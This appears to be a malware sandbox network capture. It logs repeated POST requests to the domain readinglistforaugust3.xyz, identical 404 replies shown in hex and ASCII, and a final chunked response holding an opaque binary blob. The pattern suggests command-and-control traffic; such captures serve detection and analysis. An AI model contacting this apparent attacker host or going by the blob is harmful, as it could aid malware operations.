Aug 24, 2021 08:46:51.817249060 CEST	7918	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 24 Aug 2021 06:46:51 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Connection: keep-alive Keep-Alive: timeout=3
Aug 24, 2021 08:46:51.855606079 CEST	7919	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://readinglistforaugust3.xyz/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 230 Host: readinglistforaugust3.xyz
Aug 24, 2021 08:46:51.900288105 CEST	7920	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 24 Aug 2021 06:46:51 GMT Content-Type: text/html; charset=utf-8 Content-Length: 413 Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 61 64 69 6e 67 6c 69 73 74 66 6f 72 61 75 67 75 73 74 33 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.10 (Debian) Server at readinglistforaugust3.xyz Port 80</address></body></html>
Aug 24, 2021 08:46:51.970057011 CEST	7920	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://readinglistforaugust3.xyz/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 363 Host: readinglistforaugust3.xyz
Aug 24, 2021 08:46:52.015989065 CEST	7921	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 24 Aug 2021 06:46:52 GMT Content-Type: text/html; charset=utf-8 Content-Length: 413 Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 61 64 69 6e 67 6c 69 73 74 66 6f 72 61 75 67 75 73 74 33 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.10 (Debian) Server at readinglistforaugust3.xyz Port 80</address></body></html>
Aug 24, 2021 08:46:52.062522888 CEST	7922	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://readinglistforaugust3.xyz/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 268 Host: readinglistforaugust3.xyz
Aug 24, 2021 08:46:52.107935905 CEST	7923	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 24 Aug 2021 06:46:52 GMT Content-Type: text/html; charset=utf-8 Content-Length: 413 Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 61 64 69 6e 67 6c 69 73 74 66 6f 72 61 75 67 75 73 74 33 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.10 (Debian) Server at readinglistforaugust3.xyz Port 80</address></body></html>
Aug 24, 2021 08:46:52.127388000 CEST	7923	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://readinglistforaugust3.xyz/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 281 Host: readinglistforaugust3.xyz
Aug 24, 2021 08:46:52.172163963 CEST	7924	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 24 Aug 2021 06:46:52 GMT Content-Type: text/html; charset=utf-8 Content-Length: 413 Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 61 64 69 6e 67 6c 69 73 74 66 6f 72 61 75 67 75 73 74 33 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.10 (Debian) Server at readinglistforaugust3.xyz Port 80</address></body></html>
Aug 24, 2021 08:46:52.220546007 CEST	7924	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://readinglistforaugust3.xyz/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 230 Host: readinglistforaugust3.xyz
Aug 24, 2021 08:46:52.266251087 CEST	7925	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 24 Aug 2021 06:46:52 GMT Content-Type: text/html; charset=utf-8 Content-Length: 413 Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 61 64 69 6e 67 6c 69 73 74 66 6f 72 61 75 67 75 73 74 33 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.10 (Debian) Server at readinglistforaugust3.xyz Port 80</address></body></html>
Aug 24, 2021 08:46:52.313436985 CEST	7926	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://readinglistforaugust3.xyz/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 181 Host: readinglistforaugust3.xyz
Aug 24, 2021 08:46:52.360768080 CEST	7927	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 24 Aug 2021 06:46:52 GMT Content-Type: text/html; charset=utf-8 Content-Length: 413 Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 61 64 69 6e 67 6c 69 73 74 66 6f 72 61 75 67 75 73 74 33 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.10 (Debian) Server at readinglistforaugust3.xyz Port 80</address></body></html>
Aug 24, 2021 08:46:52.437999010 CEST	7927	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://readinglistforaugust3.xyz/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 183 Host: readinglistforaugust3.xyz
Aug 24, 2021 08:46:52.485865116 CEST	7928	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 24 Aug 2021 06:46:52 GMT Content-Type: text/html; charset=utf-8 Content-Length: 413 Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 61 64 69 6e 67 6c 69 73 74 66 6f 72 61 75 67 75 73 74 33 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.10 (Debian) Server at readinglistforaugust3.xyz Port 80</address></body></html>
Aug 24, 2021 08:46:52.499870062 CEST	7928	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://readinglistforaugust3.xyz/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 280 Host: readinglistforaugust3.xyz
Aug 24, 2021 08:46:52.547749043 CEST	7929	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 24 Aug 2021 06:46:52 GMT Content-Type: text/html; charset=utf-8 Content-Length: 413 Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 61 64 69 6e 67 6c 69 73 74 66 6f 72 61 75 67 75 73 74 33 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.10 (Debian) Server at readinglistforaugust3.xyz Port 80</address></body></html>
Aug 24, 2021 08:46:52.592437983 CEST	7930	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://readinglistforaugust3.xyz/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 160 Host: readinglistforaugust3.xyz
Aug 24, 2021 08:46:52.640243053 CEST	7930	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 24 Aug 2021 06:46:52 GMT Content-Type: text/html; charset=utf-8 Content-Length: 413 Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 61 64 69 6e 67 6c 69 73 74 66 6f 72 61 75 67 75 73 74 33 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.10 (Debian) Server at readinglistforaugust3.xyz Port 80</address></body></html>
Aug 24, 2021 08:46:52.694292068 CEST	7931	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://readinglistforaugust3.xyz/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 210 Host: readinglistforaugust3.xyz
Aug 24, 2021 08:46:52.780133963 CEST	7932	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 24 Aug 2021 06:46:52 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Data Raw: 33 66 66 36 36 0d 0a 00 00 a6 97 8c b4 08 02 7f 77 08 a7 e7 cb 2c c9 aa 43 96 74 c4 0c 23 20 5b f4 75 62 d6 86 a7 f2 12 bc a9 da 62 b6 a0 d6 8e 2a 03 c1 fe f5 78 80 42 09 22 23 7a 2b 5a be 51 83 37 f3 38 8f fd dd 37 2e 52 8c 23 e2 54 03 2c 1e 64 de 43 81 bc a4 b9 18 d8 e0 a3 e5 f9 b6 3f 7c 68 a0 d4 a1 a7 43 ab 78 a6 8f 31 88 43 72 56 b9 f9 4f 85 d1 73 62 c6 80 7d 19 09 03 aa d1 5f fb 83 4a 56 48 b2 50 68 63 5d d5 06 2d e0 35 a7 f9 a1 3b ac da 10 a3 d2 38 14 32 8f d7 8f 4e b3 00 be 22 88 c7 b7 d0 c7 87 45 c7 31 d5 a7 5f 81 cb 5f fb 57 79 93 73 72 62 19 33 be 34 16 e4 9c 32 11 61 7f 14 ef 78 78 30 be 80 f5 fd 31 4f c6 34 5d ee 71 0a 12 63 f7 cc eb 8b 8d 22 4f 81 4a c2 0d 6d b6 2e fa bc 06 b4 83 34 6b 27 30 77 1b bd 55 16 4a e2 50 47 9a 0e 3a 54 e9 43 82 e4 64 23 64 77 40 57 91 f8 32 2f 8f 66 60 93 9d b8 04 64 bf a3 d9 56 e5 57 72 6d f1 d5 54 ce 08 cd f7 dd e2 4e 8e 3d 17 c5 e6 c6 c6 09 b2 86 a4 a3 15 4d b1 77 12 ff a0 c1 94 52 07 2a 22 af 15 27 78 3a 02 f4 74 c6 51 e5 0d bb 27 32 43 c6 48 f8 87 a9 b2 c7 9e 43 b7 af 83 97 e1 1b d3 98 fe 36 5f 10 62 66 52 ef 2d 4c 31 5a 4f 52 54 9f 50 c5 0d 60 4f ff 1b 68 9b df 32 78 1d 2d ce d5 02 04 e7 14 ac f9 cc 13 91 3c 7a 54 19 51 5d 36 06 26 50 da 30 1c 01 8e 39 cb a8 65 17 92 54 67 f4 c1 ed fe 25 0d 1e 5d ea e8 07 3d 23 db 64 bb 2f 57 a1 7f d1 8e 65 c8 f6 1d eb 67 b7 f9 21 4d f3 77 b5 e9 ab 1c 91 23 0c 14 be a3 a6 65 79 cc 26 56 7a b9 0a dc f6 23 62 26 0a c5 53 c4 e4 66 93 38 b6 03 df 4b 2d 12 79 ba 21 49 e8 a8 25 99 a3 a0 cd 1b 38 c0 83 89 02 ed 02 65 12 aa 46 d0 d9 d6 b5 2e 51 fb ed 40 2b 76 1e 68 b3 01 67 cb 7b 20 71 b2 64 e1 26 15 96 a8 11 df f9 d4 af 46 50 bc db bb 68 fc 43 